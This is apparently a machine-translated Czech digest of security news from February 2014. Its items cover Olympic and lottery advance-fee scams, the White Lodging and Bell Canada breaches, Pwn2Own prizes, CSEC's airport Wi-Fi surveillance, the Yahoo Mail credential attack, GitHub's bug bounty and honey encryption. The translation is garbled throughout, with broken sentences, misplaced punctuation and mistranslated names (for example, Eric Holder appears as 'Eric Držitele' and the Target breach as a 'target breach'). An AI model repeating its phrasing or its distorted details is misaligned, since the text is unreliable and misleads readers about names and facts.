XXII Zimní olympijské hry oficiálně se k ní dne 7. února. Samozřejmě, že to hlavní sportovní událost není bez povšimnutí ze strany spammery. V "nigerijské" podvodníci nemohli odolat buď na konci ledna jsme obdrželi zajímavou korespondenci od někoho, kdo hledá za důvěryhodnou osobu v Rusku, kteří by mohli přenést 850.000 eur na. Chcete-li vysvětlit tak neobvyklý požadavek, autor nepoužil standardní "nigerijské" příběhy, ale citoval výlet na olympijských hrách - peníze byly potřeba pro skupinu šesti lidí, kteří se údajně určených k pobytu v Soči. Pro další informace, příjemce této velkorysé nabídce museli kontaktovat odesílatele.

Zdánlivě neškodné žádost o pomoc při organizování výlet vyklube past, s obvyklou velkou sumu peněz jako návnadu. Odkaz na skutečné události se používá přesvědčit příjemce, že žádost je skutečný. Ale výsledek je vždy stejný - spammer žádá příjemce přenést určité množství peněz, například na pokrytí nákladů na přenos, a poté, že podvodník zmizí beze stopy.


Milionáři chtějí podělit o své peníze
10.2.2014 Spam

Dopisy o loterii vyhraje jsou standardní trik používá "nigerijské" podvodníky. Velmi často se autor těchto dopisů vysvětlit, že on je šťastný vítěz loterie vyhrát multi-milión, a on neví, jak strávit nečekanou výhru, a rozhodla se obrátit na filantropii.

Během několika posledních měsíců jsme objevili několik nevyžádané zprávy odeslané ve jménu různých lidí, kteří se údajně vyhrál v loterii v posledních několika letech. Například v prosinci 2013 jsme obdrželi několik zpráv odeslaných v různých spamových zásilek a odeslané ve jménu téhož páru, který svou loterii vyhrát obdržel v roce 2012. Tyto dopisy měly různé návrhy a řekl, různé příběhy, ale všechny z nich nabídl totožnou částku ve výši 800000 liber na potenciální oběti, a dal stejný odkaz na video z tohoto rozhovoru vítěz loterie, jako způsob, jak přesvědčit čtenáře, že příběh byl pravdivý . Podvodníci se snažil být velmi stručný a neposkytl žádné informace v těle zprávy. Nicméně, zprávy v jednom z korespondence obsahovala text říká, že e-mailová adresa příjemce byl vybrán jako vítěz v charitativním projektu spolu s dvěma dalšími.

Podvodníci také použít jména jiného páru, který zřejmě vyhrál v loterii v listopadu 2013 znovu, aby se jejich podvod zprávy vypadají platnost. Tentokrát podvodníci řekl pár dělali dar ve výši 1.000.000 liber. Tam bylo v dopise žádné podrobnosti o tom, jak se čtenář mohl získat peníze, nebo proto, že loterie Vítězové rozhodli podělit se o peníze s konkrétní příjemce. Chcete-li zjistit, že informace, rádoby oběť měla odpovědět na podvod zprávy.

Podvodníci také použít novější případy. V polovině prosince 2013 se běžný Kanaďan vyhrál 40.000.000 dolarů v loterii, začátkem ledna 2014 jsme zjistili podvod pošty ve jménu nově ražené milionáře. Není překvapením, že podvodníci pokusili nalákat příjemce tím, že slíbí dát 1200000 dolarů a vyprávět příběh, že milionář se nyní dává pryč celý svůj majetek na památku své manželky, která zemřela na rakovinu dva roky dříve.

Chcete-li vytvořit nové pozemky pro své dopisy, podvodníci používají různé skutečné události, včetně obou tragédií ( úmrtí celebrit , teroristické útoky , přírodní katastrofy ) a pozitivních akcí, jako je loterie vyhraje. Ale bez ohledu na to, co je předmětem je podvod zpráv, není vůbec věřit, že odesílatel ve skutečnosti podělit se o své peníze s vámi. Nezapomeňte, že odkazy na skutečná jména a odkazy na skutečné publikací v renomovaných médiích nejsou zárukou toho, že vás někdo řekl pravdu.


Hotel management firmy porušena, údaje o platební kartě hostů na ukradený
10.2.2014 Bezpečnost
Hotel vedení firmy White Ubytování se zdá k měli jeho systémy ohrožena a útočníci se podařilo exfiltrate dosud neznámé množství kreditních a debetních karet podrobnosti.

Porušení je stále nepotvrzených společnost, která se stále vyšetřuje tvrzení a řekl, že bude "poskytovat smysluplné informace, jakmile budou k dispozici." "Začátkem tohoto měsíce, více zdrojů v bankovním sektoru začaly sdílení dat naznačuje, že byly vidět vzor podvodu na stovky karet, které byly všechny dříve používané v hotelech Marriott zhruba od 23.března 2013 na až do konce loňského roku, " hlásil Brian Krebs. "Ale ty sames zdroje uvedli, že byli na rozpacích z charakteru podvodu , protože to bylo vidět pouze na konkrétní Marriott hotelů, včetně míst v Austinu, Chicago Denver, Los Angeles, Louisville a Tampa. " Deeper badatel odkryl společné vazby mezi nimi: oni jsou provozovány White Ubytování. Také, jak to dopadá Zákazníci, kteří zaplatili za jejich pobytu na recepci jednoho Marriott nejsou v nebezpečí, nebo že jejich informace zneužity, protože řetěz je povinné pro všechny své hotely - dokonce i ty, působila jako povolení -. používat svůj systém správy nemovitostí je je ti, kteří jedli v hotelech "restaurací a nakupovali na svých obchodů se suvenýry, které si jejich informace ukradené, a bude dělat dobře kontrolovat jejich prohlášení karty pečlivě neoprávněné poplatky. White Ubytování také provozuje hotel franšízy v hotelu Hilton, Sheraton a Westin značky, ale zda jejich hosté byli postiženi stejně je zatím být objeven.


Pwn2Own 2014: 150.000 dolar za "zneužití jednorožec"
10.2.2014 Výzkum
Existuje několik nová pravidla pro letošním ročníku hackerské soutěže Pwn2Own a obrovské nové ocenění pro "Exploit Unicorn hodné mýtů a legend" - 150000 dolarů na realizaci systému na úrovni kódu v systému Windows 8.1 x64 pro Internet Explorer 11 x64 s Emet obtokem.

Zprávy byly oznámil manažerem HP ZDI Brian Gorenc, který vysvětlil, že "zkrocení exploit Jednorožec je proces, multi-step", která má následovat přísný pořadí:
Počáteční zranitelnost používaný při útoku musí být v prohlížeči. Pískoviště prohlížeče musí být odpojeny pomocí zranitelnosti v pískovišti. Samostatný zvýšení úrovně oprávnění Zranitelnost je nutné použít k získání SYSTEM-level spuštění libovolného kódu na cíl. Využití musí pracovat, když jsou zapnuty Microsoft Enhanced Mitigation Experience Toolkit (Emet) ochrany.
Bezpečnostní výzkumníci vzali na Twitter komentář k tomuto Unicorn cenu, některé komentoval sporný pořadí, a jiní o tom, zda cena stálo "pálení" tři zero-day exploity, když dva by mohlo být dost. Nicméně, problém je dobrý . k bubnování nadšení pro nadcházející soutěže, a pro testování dovedností soutěžících Další dvě kategorie soutěže jsou stejné jako v loňském roce: Prohlížeče a moduly plug-in. Výzkumníci, že se podaří rozlousknout Chrome nebo Internet Explorer v systému Windows 8.1 X64 dostane $ 100,000 těch, kteří úspěšně rozbít Firefox (také v systému Windows) nebo Apple Safari na Mac OS X Mavericks dostane 50.000 dolarů a 65.000 dolar, resp. Hacking Adobe Reader nebo Flash na IE 11 na Windows budou odměněni 75000 dolarů, zatímco obchází Java na stejné nastavení s 30.000 dolarů. Úspěšní soutěžící obdrží také notebook, na které prokáží kompromis, stejně jako 20000 ZDI věrnostní body, které se automaticky kvalifikuje pro jednorázové 5.000 dolarů v hotovosti výplatu, 15% peněžní bonus a 25% Odměnou bod bonus na všech zranitelností předložených ZDI během příštího kalendářního roku, a placených cestování a registraci, aby se zúčastnili v roce 2014 DEFCON konferenci v Las Vegas. Zájemci mohou najít kompletní pravidla letošního ročníku soutěže zde.


Narušení bezpečnosti, ztráty dat a výpadky náklady nemocnic v USA $ 1.6B
10.2.2014 Bezpečnost | Kriminalita
Nová zpráva MeriTalk, na základě průzkumu zdravotní IT manažerů a uzavírat EMC, kvantifikuje organizační náklady spojené s narušením bezpečnosti, ztráty dat, a neplánovaných odstávek pro poskytovatele zdravotní péče, a to na více než 1.6B dolarů ročně.

Údaje o zdravotním stavu je často terčem pro nebezpečné činnosti a 61 procent světových zdravotnických organizací dotazovaných zažili vztahující se k bezpečnosti incident v podobě narušení bezpečnosti, ztráty dat, nebo neplánovanými prostoji alespoň jednou v posledních 12 měsících. narušení bezpečnosti: Téměř jeden z pěti (19 procent) světových zdravotnických organizací došlo k porušení zabezpečení v posledních 12 měsících za cenu 810,189 dolarů za incident. Vedoucí Health IT říkají, že nejčastější příčiny breaches patří malware a viry (58 procent); outsider útočí (42 procent), fyzické bezpečnosti - ztráty / krádeže zařízení (38 procent) a chybové uživatelů (35 procent). Ztráta dat: Téměř jeden ze tří (28 procent) světových zdravotnických organizací došlo ke ztrátě dat v posledních 12 měsících v celkové hodnotě 807.571 dolar za incident. A z těch, více než třetina (39 procent) zažily 5 nebo více výskyt ztráty dat v uplynulých 12 měsících. Běžné příčiny ztráty dat patří selhání hardwaru (51 procent), ztráta síly (49 procent) a ztrátu záložního napájení (27 procent). neplánovaných výpadcích: Téměř dva z pěti (40 procent), globální zdravotnické organizace zažili neplánované výpadek v posledních 12 měsících za cenu 432.000 dolarů za incident. V průměru zdravotnické organizace ztratily 57 hodin na neplánovaných prostojů během posledních 12 měsíců. Mezi nejčastější příčiny výpadků patří selhání hardwaru (65 procent), ztráta energie (49 procent), selhání software (31 procent). A dat korupce (24 procent), poskytovatelé uznávají, tam je více práce je třeba udělat. Méně než jeden-na-tři respondenti (27 procent) věří, že jejich organizace je plně připraven pro zajištění nepřetržité dostupnosti ePHI při neplánovaných výpadků, zotavení po havárii, nebo provoz nouzového režimu. A poté, co tísňové uplynulo pouze 50 procent respondentů věří, ve schopnosti jejich organizace obnovit 100 procent údajů požadovaných SLA. Více než polovina (56 procent) by bylo třeba osm hodin nebo více k obnovení 100 procent dat. Většina - 82 procent - tvrdí, že jejich technologie, infrastruktura není plně připraven na incidentu zotavení po havárii. uznávajíce význam důvěryhodných IT řešení, organizace v plánu zaměřit se na šifrování chráněné zdravotní informace (55 procent), v souladu s analýzou bezpečnostních rizik EMR smysluplné využití požadavky (54 procent);. a prevence a detekce narušení (44 procent), "Zdravotnictví organizace dělají značné investice do IT pro transformaci IT infrastruktury a zajistit, aby informace, pacient je bezpečné, chráněné a vysoce dostupné," říká Scott Filion, generální ředitel, Global Healthcare, EMC Corporation. "Důvěra se stala prioritou obchodní board-úrovni. Zdravotnické organizace se vždy zaměřuje na informační bezpečnosti, ale dnes musí udělat více pro ochranu dat a zajištění dostupnosti pro splnění požadavků ARRA HITECH HIPPA. " Ze zdravotnických organizací, které nejsou v současné době nabízejí zvláštní schopnosti IT "jako služba", polovina plánu k tomu, aby během příštích pěti let. Řada států přijímá klíčové kroky k přípravě - včetně:

HIPAA Security Analýza rizik jako součást EMR smysluplné využití požadavků na 46%
Single Sign On a ověřování pro webové aplikace a portály: 44%
Nástroje pro audit a řízení log: 43%
Šifrování pro chráněné zdravotní informace: 42%
Multi-faktor autentizace pro vzdálený přístup pro klinické pracovníky k sítím (včetně ePHI) na dálku: 35%
Analytics zabezpečení, které pomáhají s prevencí narušení: 32%
Centralizovaná správa a ověřený přístup ke zdravotním informacím: 31%
Data Loss Prevention sledovat umístění a tok citlivých údajů: 29%.


Řešení pro upevnění unesených nastavení Chrome
10.2.2014 Zabezpečení
Mnoho uživatelů - ne-li všechny - zažili stažení zdarma spořič obrazovky nebo hry, aniž by při pohledu na malým písmem, a v důsledku toho, jak se jejich prohlížeč nevědomky zatížena nežádoucím nástrojů, add-on nebo homepage. Podle Linus Upson, Google VP Engineering, Problém nastavení unesených prohlížeče je ten, který trápí mnoho uživatelů Chrome. Loni v říjnu, firma přidáno tlačítko "reset nastavení prohlížeče" na svém prohlížeči, ale to je zřejmě nestačí, a že nyní začne uživatelům Windows, jejichž nastavení byly změněny, pokud by chtěli obnovit jejich nastavení prohlížeče zpět do továrního nastavení s dotazem :

Varianta přichází s varováním: krok bude také zakázat (ale ne odinstalovat) Nezáleží Rozšíření, aplikace nebo motivy jsou uživatelé sami se rozhodli použít. Naštěstí se aplikace bude automaticky znovu aktivována, když uživatelé používají se jim velmi příště a vybrané rozšíření lze jednoduše znovu aktivovat ručně. Tento nejnovější přírůstek z týmu Chrome byl zaveden, protože někdy únosci zanechat procesy zaměřené na podkopání uživatelský ovládací prvek nastavení opakovaně po krátké časové úseky byly předány. budou Tato nová funkce neřeší Tento druhý problém trvale, ale umožní uživatelům low-level dočasně odstranit takové obtíže s jediným kliknutím tlačítka. Ti, kteří hledají více trvalé řešení - tj. odinstalování nastavení tichého přesměrování programů - se doporučuje vyzkoušet Chrome Fórum nápovědy pro krok-za-krokem


Dell vydává bezpečné, spravované, ultra-mobilní cloud přístup k zařízení
10.2.2014 Mobil
Společnost Dell oznámila, Dell Wyse Cloud Connect, ultra-kompaktní a vysoce mobilní cloud pro přístup k zařízení, o který přináší virtualizaci desktopů a osobní služby cloudu na jakékoli HDMI nebo MHL povoleným displeji.

Kapesní přístroj nabízí full-HD zkušenosti s bezpečností na podnikové úrovni, ovladatelnost a spolehlivost. Zařízení podporuje různé případy použití, včetně mobilních pracovníků, studentů, digital signage, kiosků a jiných prostředích s omezeným prostorem. Konkrétní výhody pro zákazníka patří:

Rychlý a bezpečný přístup mobilních a vzdálených pracovníků do virtuálních desktopů a různých cloudových majetku, včetně obsahu, aplikací, virtuálních desktopů a IT podpory
Na osobních počítačích se systémem Microsoft Windows OS nebo Apple Mac OS přístup k datům, obsahu nebo aplikace Snadné vzdálené připojení
Plug-and-play interaktivních prezentací běží v rozlišení Full-HD přímo z cloudu nebo zařízení, na jakémkoli kompatibilním displeji
Kapesní velikost, bez baterií alternativa v případě ztráty, odcizení nebo selhání primární zařízení
Cost-efektivní virtuální desktop na trhu vzdělávání, rozšiřování aplikací a přístup k datům v učebnách, knihovnách, laboratořích nebo doma
Digital signage řešení se zjednodušenou, vzdálenou správu pro letiště, maloobchodníci, pohostinství, nebo jiných organizací
Osobní cloud přístup k on-line zábavě, hraní her, aplikací a bohatého obsahu na velkých displejích.
"Cloud Connect je jedním z nejvíce řezání-hrana mobilní tenký klient řešení, které jsme otestovali v našich laboratořích," řekl Joseph Koré, vrchní ředitel a vedoucí Kochi operací, obeznámeny. "Díky schopnosti hladce pracovat s prostředí Citrix, Microsoft a VMware, řešení má velký potenciál pro futuristické podnik, který hledá způsoby, jak zlepšit produktivitu při práci a na cestách pro své podnikové pracovní síly." Cloud Connect je 129 dolarů za jednotku . Doplňkové Dell příslušenství včetně MHL-schopných displejů a klávesnic Bluetooth a myši jsou také k dispozici.


Hackeři porušení Bell Canada, úniku zákaznické informace a hesla
10.2.2014 Incidenty | Hacking
Hacker skupina NullCrew se podařilo pro přístup k serverům, které patří do Bell Canada - nebo dodavatel třetí strany, jako Bell tvrdí - a krást a v konečném důsledku úniku uživatelská jména a hesla, e-mailové adresy, dílčí údaje o kreditní kartě a více asi 20.000 + zákazníků Bell. NullCrew hackeři oznámila, že únik před několika týdny, a byly zveřejněny údaje výpisem tuto sobotu. Místo hosting výpis byl uveden do režimu offline, ale ne dříve, než někteří výzkumníci zabezpečení a pravděpodobně někteří počítačoví podvodníci se podařilo stáhnout. blogger za DataBreaches.net se dotazoval na hackery, a bylo prokázáno screenshotů z rozhovorů a na hacking procesu, který doložit své tvrzení, že oni měli přístup k serveru Bellova pro měsíce, a že oni (neúspěšně) pokusil informovat Bell ní a zranitelnosti, která jim umožnila montáž SQL injekce proti řízení ochrany přihlašovací stránce společnosti (https:/ / protectionmanagement.bell.ca/passwordrecovery_1.asp). Po krátkém vyšetřování, Bell Canada potvrdil informace kompromis, ale řekl, že servery v otázce nejsou jejich. "Bell dnes oznámila, že 22.421 uživatelská jména a hesla a 5 platnou kreditní kartu počet Bell malé firemní zákazníky byly zveřejněny na internetu tento víkend. vysílání výsledky z nelegální hacking informačních technologií systému Ottawa na bázi třetí strany dodavatele to, "že uvedl v neděli. "V souladu s našimi přísnými zásadami ochrany osobních údajů a bezpečnosti , Bell je kontaktovat postižených malých firemních zákazníků, má zakázané všechny dotčené hesla, a informoval příslušné společnosti vydávající kreditní karty. Budeme i nadále spolupracovat s dodavateli, stejně jako prosazování práva a bezpečnostním vládní úředníky, aby věc vyšetřil. vlastní sítě Bellova a IT systémy nebyly ovlivněny. " NullCrew stále tvrdí, že je to vlastní servery, Bell, který dostal hacknutý, ale společnost zopakovala své tvrzení, že patří k dodavateli třetí strany. Security badatel Adam Caudill komentoval na Twitteru, že Bellova verze by mohla být pravda. "Viděl jsem více než jednou, kde subdoména velké společnosti bodů na třetí osobu," řekl řekl a dodal, že jeho společnost hostí jeden pro "velmi velké banka ". "Tak to je docela možné, že se pravdu. Měly by trvat ještě větší zodpovědnost za své údaje však," dodal. Dalším Twitter uživatel hledal šetření subdomény v otázce, a ukázalo se, že je registrován Ottawa bázi Magma komunikace.


Kanadská špionážní agentura používá na letiště zdarma Wi-Fi sledovat cestující
8.2.2014 Špionáž
Nová zpráva na základě dokumentů poskytnutých NSA informátorů Edward Snowdena bude Kanaďané otázku, zda elektronické špionážní agentura v zemi dělá, jak tvrdí, práci v mezích stanovených zákonem. 27.-strana-dlouhé prezentace PowerPoint ze dne 05. 2012 a potvrzené se vytvoření zabezpečení komunikace Kanada (CSEC) logo informací, jak agentura shromážděných informací (metadata identifikující bezdrátová zařízení, jejich umístění, hovory) z bezplatné Wi-Fi nabízené služby na hlavních kanadských letištích, aby bylo možné sledovat uživatelům zařízení "několik dní po odešli na letiště a připojen k bezplatné Wi-Fi hot spotů v celé Kanadě. Protože systém nemá žádný způsob, jak zjistit, zda majitel zařízení je Kanaďan, nebo ne, to dá rozum, že mezi údajů shromážděných agenturou je rovněž údaje, které mohou být použity identifikovat kanadské občany, a objevit své pohyby. Ronald Deibert, vedoucí Citizen Lab na University of Toronto, která se zaměřuje svůj výzkum na globální bezpečnosti a lidských práv, řekl, že věří, že praxe je téměř jistě nezákonné. CSEC uvedl, že je "pověřila sbírat cizí signály inteligenci chránit Kanadu a Kanaďany", a má proto právní pravomoc shromažďovat a analyzovat metadata. "Je to opravdu neuvěřitelné, že CSEC by se zabýval tímto druhem dohledu Kanaďanů. Of nás," komentoval Ann Cavoukian , Komisař pro ochranu soukromí Ontario. "To se podobá činnosti totalitního státu, ne svobodné a otevřené společnosti." To je neznámo jak agentura vlastně dostal bezdrátová data, hlásí kanadský Broadcasting Corporation (CBC). Dokument říká, že data byla dobrovolně "speciální zdroj", ale Toronto a Vancouver Airport úřady, které pracují Wi-Fi služby svých letištích ", popřel poskytování údajů, které každém kanadské rozvědky, a stejně tak Boingo, společnost se sídlem v USA, která provozuje tyto služby v jiných letištích v Kanadě . Dokument také naznačuje, že shromážděné informace, které mají být sdíleny s ostatními členy Pět Oči zpravodajské sítě:. USA, Velké Británii, Austrálii a na Novém Zélandu


Yahoo Mail účty ohrožena v koordinovaný útok
8.2.2014 Incident | Kriminalita | Hacking
Neznámý útočník se pokusil o přístup k několika Yahoo Mail účty, společnost varoval ve čtvrtek, a vyzval uživatelům změnit své heslo, i když nebyly ovlivněny.

"Na našich současných poznatků, seznam uživatelských jmen a hesel, které byly použity k provedení útoku byl pravděpodobně shromážděny z databáze třetí strany kompromisu. Nemáme žádný důkaz, že byly získány přímo od systémů Yahoo," sdílené Jay Rossiter, Yahoo senior viceprezident platforem a personalizace výrobků. "Naše pokračující vyšetřování ukazuje, že škodlivý počítačový software používá seznam uživatelských jmen a hesel pro přístup k Yahoo Mail účty. Informace požadované v útoku se zdá být jména a e-mailové adresy z nejvíce postižených účty" poslední odeslané e-maily. " Společnost provedl reset hesla na impaktovaných účtů, a dotčené uživatelé budou vyzváni k opětovnému zajištění jejich účty změnou hesla. "Kromě přijímání lepších heslo postupy změnou své heslo pravidelně a za použití různých variant symbolů a postav, uživatelé by nikdy neměli používat stejné heslo na více místech nebo služeb, "dodal. "Použití stejné heslo na více místech nebo služeb činí uživatelům obzvláště zranitelné vůči těmto typům útoků." Společnost neřekl, kolik mailové účty byly ovlivněny. napadených účtů mohly být použity k rozesílání nevyžádané pošty přímo, ale Shromážděné informace (jména a e-maily kontakty "), lze také použít, aby se scammy e-maily z jiných zdrojů vypadat legitimní.


GitHub nastaví chyba nájemný programu
8.2.2014 Zranitelnosti
GitHub je nejnovější služba oznámila, že oni začali bezpečnostní chyba bounty program. "Myšlenka je jednoduchá: hackeři a výzkumníci bezpečnostních najít a nahlásit chyby zabezpečení prostřednictvím našeho odpovědného procesu zveřejňování Pak uznat značné úsilí, aby tito výzkumníci často vztáhl. při lovu se chyby, budeme odměnou jim s trochou studené tvrdé hotovosti, "uvedli ve svém blogu ve čtvrtek. Odměny se budou pohybovat od 100 dolarů až na $ 5000 a skutečné částky, které mají být rozhodnuto tým na případ od případu podle , a tím, že v úvahu řadu faktorů. "Například, pokud zjistíte, že odražené XSS, které je možné pouze v Opeře, a Opera je <2% našeho provozu, pak závažnost a odměna bude nižší. ale přetrvávající XSS, který pracuje v Chrome, při> 60% našeho provozu, bude vydělávat mnohem větší odměnu, "vysvětlili. Zpočátku se bug bounty omezena na zranitelnosti objevené v hlavním webových stránkách GitHub je ( Github.com ), na GitHub API, a GitHub Gist, služba pro sdílení úryvky kódu nebo jiného obsahu textu. Tým říká, že budou reagovat tak rychle, jak je to možné tím, co tvrdí, a udržet zadavatel aktualizován pracují na opravy chyby. "Nebudeme podniknout právní kroky proti vám, pokud budete hrát podle pravidel , "oni se o to přidat.


Globální pohled na útoku provozu a bezpečnosti
8.2.2014 Bezpečnost | Ochrana
Akamai vydala svou poslední zprávu , která poskytuje vhled do hlavních globálních statistik o útoku provozu a bezpečnosti. Akamai udržuje distribuovaný soubor budoucnu nebyly propagovány agentů nasazených přes internet, které se přihlašují pokusy o připojení, které společnost klasifikuje jako útok provozu. Na základě údajů získaných těmito původci základě Akamai je schopen identifikovat vedoucí země ze které napadají traffic pochází, jakož i jako top ports na které se tyto útoky. To je důležité pro poznámku, nicméně, že země původu označeného zdrojová IP adresa nemůže zastupovat národ, ve kterém útočník nachází. Například, jednotlivec ve Spojených státech může být zahájení útoků z napadených systémů kdekoli na světě. Akamai pozorován útok provoz pocházející ze 185 unikátních zemích / oblastech během třetího čtvrtletí roku 2013, a to až 10 více než v předchozím čtvrtletí. Čína, která pochází 35 procent sledovaných útoků, se vrátil na první místo v tomto čtvrtletí poté, co byl sesazen Indonésií ve druhém čtvrtletí. Indonésie, mezitím klesla zpět na druhé místo po původních 20 procent sledovaných útoků - o něco více než polovina objemu vidět ve druhém čtvrtletí. Spojené státy zůstala na třetím místě, jak to vzniklo 11 procent sledovaných útoků během třetího čtvrtletí, a to až z 6,9 procenta v předchozím čtvrtletí. Celkově koncentrace útoků klesl během třetího čtvrtletí roku 2013, s top 10 zemí původu 83 procent sledovaných útoků, ve srovnání s 89 procent ve druhém čtvrtletí. Čína a Indonésie, nicméně, pokračoval pochází více než polovina všech sledovaných útoku provozu. Poté, co klesl na třetí místo v druhém čtvrtletí, Port 445 (Microsoft-DS) se vrátil na své místo jako nejvíce cílené přístavu ve třetím čtvrtletí čerpání 23 procent z pozorovaných útoků. Port 80 (WWW [HTTP]) a port 443 (SSL [HTTPS]) klesl na druhé a třetí místo na 14 a 13 procent, resp. Port 445 je nejvíce zaměřena přístav v osmi z top 10 zemí / regionů, jedinou výjimkou je Čína a Indonésie. Port 1433 (Microsoft SQL Server) byl nejvyšší cíl pro Čínu a port 443 byl nejvíce cílené z Indonésie. Kromě vyjádření k útoku provozu, stát Internet zprávě obsahuje vhled do DDoS útoků na základě zpráv od zákazníků Akamai. Poprvé od čtvrtého čtvrtletí roku 2012, kdy začal Akamai podávání zpráv o DDoS útoků, méně útoky byly hlášeny než v předchozím čtvrtletí, s 281 pozorováno ve třetím čtvrtletí roku 2013 ve srovnání s 318 v průběhu druhého čtvrtletí (pokles o 11 procent). Celkově lze říci, Akamai viděl další útoky přes třetí čtvrtletí roku 2013 (807), než tomu bylo ve všech 2012 (768). podnikatelský sektor i nadále být vedoucím terčem DDoS útoků s 127 hlášených ve třetím čtvrtletí, obchod byl vedle s 80, následuje Media & Entertainment (42), veřejném sektoru (18) a High Tech (14). Akamai také začala zkoumat pravděpodobnost, že zaútočit na cíle mohou být předmětem následné útoky. Z 281 za třetí čtvrtletí útoků, 169 byly zaměřeny na jedinečných cílů. V průběhu čtvrtletí, 27 zákazníci byli napadeni podruhé, pět hlášeny tři útoky a sedm společností byly napadeny více než třikrát. Počáteční analýza údajů naznačuje, že pokud společnost je terčem útoku DDoS, tam je 25 procent šance, že by mohl být napaden znovu do tří měsíců.


Jak obnovit smazané nebo poškozené digitální měnu
8.2.2014 Bezpečnost
Popularita Bitcoin a další digitální / šifrovací měny nelze popřít. Různí uživatelé rádi používají to z různých důvodů, ale mnozí souhlasí s tím, že otázka zachování jejich skrýš bezpečná je něco, co se občas drží je až v noci. , začali různé služby s měnou je rostoucí popularitou vyskakování pomoci vyřešit tento dilema. Přesto, někteří se rozhodli, aby jejich digitální peníze na vlastních zařízeních. Ale co se stane, pokud tato zařízení rozebrat, dojde k poškození, nebo si omylem vymazal? Chris Bross, Senior Enterprise Recovery inženýr dobře-známý pro obnovu dat firmy DriveSavers, nedávno byl zapojený do několika málo případech, kdy zákazníci potřebují jejich digitální měnu zpět. " V minulosti jsme obvykle byli požádáni, aby obnovit uživatelem vytvořené datové soubory, jako jsou fotografie, QuickBooks, videa, atd. Nyní jsou vyzváni k obnovení digitální měně, "sdílel s Help Net Security. "Nechtěli jsme především začít nabízet služby pro obnovu uživatelům Bitcoin, zákazníci prostě k nám přišel prosit o pomoc." Obvykle se hodnota údajů o každém zařízení je měřen uživatele, kterému patří. Proces obnovy může být poměrně drahé, ale když Bitcoins jsou v sázce, je hodnota oživení je ještě více vyplatí. Zatím, společnost má 8 žádosti o obnovu digitální měna, 7 pro Bitcoin a 1 pro Litecoin. "V Obecně platí, že selhání hardwaru skladovacích zařízení jsou častější, ale v mnoha případech uživatelé byli zcela na omylu, protože vymazány údaje, a ve dvou případech dokonce přepsal ji, "vysvětlil. Tyto dvě případů skončila s odborníky vymáhání wallet.dat soubory, ale šifrovaná data byl bohužel poškozen za opravou. "Jak jsem řekl, není situace zcela beznadějná a vždy chceme pokusit se o obnovu dat, co nejdříve poté, co k události došlo ke ztrátě dat, aby zabránit uživateli dělat špatná volba, která vede k dalšímu poklesu, "poznamenává. Zatímco společnost většinou pro více s firmami, které potřebují obnovit data, všechny jejich žádosti o Bitcoin oživení dosud byli od jednotlivců. "Téměř ve všech případech uživatel držel pouze jednu kopii svého wallet.dat souboru na jednom paměťovém zařízení, "říká Bross." Tři z osmi celkového počtu případů byly uloženy na SSD (prodává state drive), zatímco jiní byli on HDD. Ve všech případech, uživatelé nevěřila dostupné zálohování cloud nebo jiné možnosti replikovat svá důležitá data Bitcoin. " V jednom konkrétním případě, kdy zákazník uložené své digitální peněženku na jeho Microsoft Surface Pro tablety, provedl řadu kroků, které vedly k ztrátě dat a zdravotně postižené schopnost počítače až k bota autobus, museli vyvinout novou metodu, aby mohli vytvořit obraz o SSD, aniž by fyzicky vytahování z tabletu. "Vzhledem k tomu, že byl SSD, tam byly obavy BGC (pozadí sběr odpadků), procesy, které by se mazat a dezinfikovat chybějící údaje jako normální funkce údržby systému. Potřebovali jsme, aby zachytit a zastavit ty procesy, ke zmírnění žádnou doplňkovou ztrátu dat, "sdílel. "Myslíte si také nabízí službu sledování a vymáhání ukradené Bitcoin?" zeptal jsem se a dostal negativní odpověď. "I když děláme nabídku forenzní služby pro obnovu dat na žádném případě, že mohou skončit v soudním řízení nebo stíhání, "poznamenal Bross. Nakonec jsem se ho zeptal sdílet několik tipů na to, jak udržet své digitální měnu v bezpečí. "Tisk na papír. Ironií je, že v dnešní moderní době digitální všechno, papír a inkoust jsou spolehlivější a vydrží déle než magnetické nebo skladování pevného stavu, "nabídl se. "Kromě toho, aby více kopií souborů na jiné zabezpečené a šifrované média, která vás osobně kontrolu sami. Pokud se rozhodnete uložit tato data do cloudu, být dobře informováni o možných cloud bezpečnostních chyb a rizik.


"Miláčku šifrování" přemůže útočníky s falešnými výsledky
8.2.2014 Šifrování
Bývalý šéf RSA vědec Ari Juels pracuje na inovativním přístupem k šifrování, které by mohly učinit kybernetické podvodníci ", jako je mnohem obtížnější.

Tento nový šifrovací systém - přezdívaná "Honey šifrování" - nespoléhá na složitější šifrovací algoritmus, ale na to, že pokaždé, když se útočníci pokusí dešifrovat data nebo odhadnout (hrubou silou) heslo, systém vrátí realisticky vypadající údajů -. zda odhad je správný, nebo ne "Každý dešifrování bude vypadat věrohodně," říká Juels. "Útočník nemá žádný způsob, jak se odlišit a priori, který je správný." A bude proto muset testovat všechny výsledky, pokud se chce dostat ke správnému -. Potenciálně nelehký úkol, který nebude stát za námahu přístupu a systém je založen na research Juels prováděné u Thomase Ristenpart, asistent profesor na University of Wisconsin, ve kterém předložila myšlenku "honeywords" - falešných hesel -. jsou spojeny s uživatelskými účty spolu se správnému " Protivník, který krade soubor hash hesla a invertuje funkci hash nelze říci, zda našel heslo nebo honeyword. pokus o použití honeyword pro přihlášení spustí alarm, "vysvětlili. Juels věří Honey šifrování může být Velkou pomocí pro manažerské heslo služby, jejichž celý on-line život uživatelů závisí na jediném hlavním heslem. Podle MIT Technology Review , je to v současné době pracuje na vytvoření falešné heslo úložiště generátor, který by poskytoval falešné výsledky. Vzhledem k tomu, obrovský počet přihlášení pověření ukradené a unikly v posledních několika letech a menší z uniklých správce hesel klenby, vytvoření věrohodné falešné výsledky by měly být snadný úkol.


Nové informace o cílové porušení vyjdou na světlo
8.2.2014 Incidenty
Protože jsou datová výpisy z karty ukradené v cílovém porušení i nadále prodávat na podzemních počítačové kriminality fórech, a ukradené informace jsou využívány k provádění unauthorized platby, americký generální prokurátor Eric Držitele uvedl, ministerstvo spravedlnosti je "odhodlán zasadit se o nenacházím pouze pachatelé těchto druhů narušení dat - ale také případné jednotlivců a skupin, kteří využívají tato data prostřednictvím podvodů s kreditními kartami ".

